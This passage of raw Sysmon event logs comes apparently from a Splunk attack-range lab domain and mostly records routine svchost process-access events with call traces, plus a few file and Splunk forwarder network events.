08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.603{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=A9D920D6EEB98721871E9523BA384123,SHA256=83898458F4CC47E7E7AFD902E603A959DBF51B7CAEBC0FC9D1C6D9AB7E0EE235,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.516{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C750D55CC5C176C5ADA9F27B961BACE9,SHA256=3E2496640E0B52D3A2FECAB98EBFD6397113DC3DCA31F245AFA87168A906060F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:20.983{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57457-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001054524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:23.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DAD55ADD79F4C1C8F2A8E5D47FF1245,SHA256=233DA09F6036FC5477506986839AC89EEFCFAF466B761A57F8F168A6E3EF6D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:23.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 